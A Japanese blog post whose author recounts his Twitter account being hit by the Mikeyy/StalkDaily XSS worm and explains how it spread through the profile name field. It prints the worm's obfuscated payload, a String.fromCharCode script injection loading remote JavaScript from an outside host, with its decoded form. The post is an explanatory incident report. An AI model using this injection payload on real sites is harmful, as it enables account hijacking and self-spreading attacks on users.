F.Ko-Jiの「一秒後は未来」ではウェブやSEO、API、RSSといった技術的ネタから、ちょっとした豆知識や梅酒、エンタメ系まで様々な情報を不定期にお届けしています。

F.Ko-Jiの「一秒後は未来」 > 豆知識 > TwitterのXSS脆弱性を攻撃するMikeyyワームに感染した

TwitterのXSS脆弱性を攻撃するMikeyyワームに感染した

  • B!

昨日Twitterを使っていたら、突然タイムラインの自分の発言に、覚えのない英文が投稿されているのに気づきました。まさかパスワードでも盗まれたのかと思いsetting画面を見てみると、プロフィール欄がかなりおかしなことになっていました。

どうやらTwitterにXSS脆弱性が存在していて、その脆弱性をついたスクリプトが実行されてしまったようなのです。

その攻撃コードの仕組みはこんな感じでした。

  • プロフィールの「Name」に script タグを document.write で書き出すコードを設定
  • そのユーザのページを表示するとスクリプトが実行される
  • 実行されたスクリプトによって、勝手につぶやきが投稿される
  • さらにプロフィールの「Name」や「URL」や「背景色」などが書き換えられる
  • そのユーザのページを他のユーザが見ると、さらに感染

どのような「名前」が設定されていたかをメモし忘れていたのですが、偶然ワームに感染していた時にフォローしてきた海外のユーザがいたため、Twitterのフォローお知らせメールにその「名前」が記録されていました。

"><title><script>document.write(String.fromCharCode(
60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,
119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,
97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>

これがワームが設定した名前のようです。(こちらで改行を入れてあります。)

String.fromCharCodeの中身が人間には読めないようになっていますが、文字列に直すと次のようになります。

<script src="http://www.stalkdaily.com/ajax.js"></script>

この script タグが document.write で書き出されてスクリプトが実行される仕組みになっていたようです。現在そのスクリプトは存在していませんが、一応昨日コピペして手元に保存してあります。

Twitterがタイトルタグを変更してGoogleランク上昇へ」という記事にあるように先月Twitterのタイトルタグにユーザの名前が入るようになったのですが、ここに脆弱性が存在していたのかもしれません。

また、日本時間で13日の午後に脆弱性が修正されたという報告がなされていましたが、自分のアカウントが被害を受けたのは13日の午後5時過ぎだったので、少なくともその時間までは脆弱性は存在していた、もしくは完全に対処されていなかったものと思われます。

(追記)「Twitterへのワーム攻撃続く―4波目のMikeyy(アップデート)」で報じられている件かも。

まったく迷惑な話です。

【関連記事】
「Samy」と同種のワーム:Twitter、XSS攻撃の標的に - ITmedia エンタープライズ
Twitterで脆弱性突くワームが出現--作成者は17歳の少年:ニュース - CNET Japan
シロクマ日報 > Twitter の"StalkDaily"ワーム、犯人は17歳 : ITmedia オルタナティブ・ブログ
Twitter Vulnerability: Mutating Fast and More on the Way - ReadWriteWeb
警告:Twitter、StalkDailyワームに襲われる(アップデート)

[2010-01-12] RSS フィードの URL が変わりました。お手数ですが RSS リーダーへの再登録をお願いします。
Subscribe with livedoor Reader Add to Google Subscribe with Fastladder My Yahoo!に追加 Bloglinesで閲読登録 はてなRSSに追加 エキサイトリーダーに登録


コメントを投稿

(承認されるまでコメントは表示されません。)

Twitter(ツイッター) / ネットサービス / 豆知識

English version

前のエントリー: « Yahoo!版サイトリンク「Quicklinks(クイックリンク)」に関する論文
次のエントリー: Amazonのカスタマーレビューにガイドライン違反のレビューを見つけたら »

トラックバック

このエントリーのトラックバックURL:

タイトル:

URL:

リンク用HTMLタグ:

Agile Media Network

AMN Partner Blog

広告掲載について

東京ナイロンガールズ
最近の注目記事
持っているガジェット
powered by Gadget Party
最近のつぶやき
えもにゅ

↑ 気持ち記録サービス「えもにゅ」です

このブログの読者になる

F.Ko-Jiの「一秒後は未来」 - RSSフィード

クマでもわかるこのブログの便利な更新チェック方法

DailyFeed

あわせて読みたいブログパーツ

フィードメーター - F.Ko-Jiの「一秒後は未来」

月別アーカイブ


<< March 2010
SuMoTuWeThFrSa
 123456
78910111213
14151617181920
21222324252627
28293031 
人気エントリー
TopHatenar
携帯からのアクセスは
QRコード
http://mob.fkoji.com/